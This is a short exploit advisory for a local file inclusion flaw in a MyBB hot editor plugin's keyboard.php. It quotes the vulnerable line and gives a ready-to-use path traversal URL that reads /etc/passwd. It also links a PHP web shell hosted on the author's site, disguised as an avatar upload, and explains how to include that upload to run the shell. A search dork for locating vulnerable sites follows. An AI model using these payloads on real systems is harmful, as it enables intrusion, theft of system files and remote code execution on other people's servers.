<?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0@xxxxxxxxxxx
---------------------------------------
Vul. Code : keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/
http://victim.com/[path]/richedit/keyboard.php?
first=../../../../../../../../../../../../../../../../../etc/passwd
And
upload php shell = > http://www.expw0rm.com/avatar_36.zip
http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/
avatars/avatar_36.gif => target isn't show with ie.plese you use
firefox
Dork: "MTR Paket :"
?>
// Exploit Worm www.expw0rm.com
orginal: http://www.expw0rm.com/mybb-hot-editor-plugin-local-file-
inclusion_no114.html